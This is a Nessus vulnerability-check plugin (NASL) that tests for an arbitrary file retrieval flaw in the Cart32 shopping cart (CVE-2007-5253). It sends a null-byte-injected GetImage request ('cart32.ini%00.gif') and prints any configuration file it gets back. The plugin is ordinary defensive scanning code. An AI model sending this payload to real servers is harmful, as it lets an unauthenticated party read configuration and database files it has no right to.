#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a CGI script that is affected by an
information disclosure vulnerability. 

Description :

Cart32, a shopping cart application, is installed on the remote host. 

The remote installation of Cart32 fails to sufficiently validate input
to the 'GetImage' function of 'c32web.exe' script before returning the
contents of arbitrary files, not just image files as intended.  An
unauthenticated remote attacker can exploit this issue to retrieve
arbitrary files, such as the application's configuration or database
files. 

See also :

http://www.securityfocus.com/archive/1/481489/30/0/threaded

Solution :

Upgrade to Cart32 version 6.4 as that version reportedly resolves the
issue. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(26924);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-5253");
  script_bugtraq_id(25928);
  script_xref(name:"OSVDB", value:"38580");

  script_name(english:"Cart32 Arbitrary File Retrieval Vulnerability");
  script_summary(english:"Tries to retrieve Cart32's config file");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/shr-cgi-bin", "/store", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to retrieve Cart32's config file.
  file = "cart32.ini";

  req = http_get(
    item:string(
      dir, "/c32web.exe/GetImage?",
      "ImageName=", file, "%00.gif"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if it looks like the config file.
  if (
    "Cart32" >< res &&
    "C32WebName=" >< res
  )
  {
    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Here are the contents of Cart32's configuration file that Nessus was\n",
      "able to read from the remote host :\n",
      "\n",
      res
    );
    security_warning(port:port, data:report);
    exit(0);
  }
}
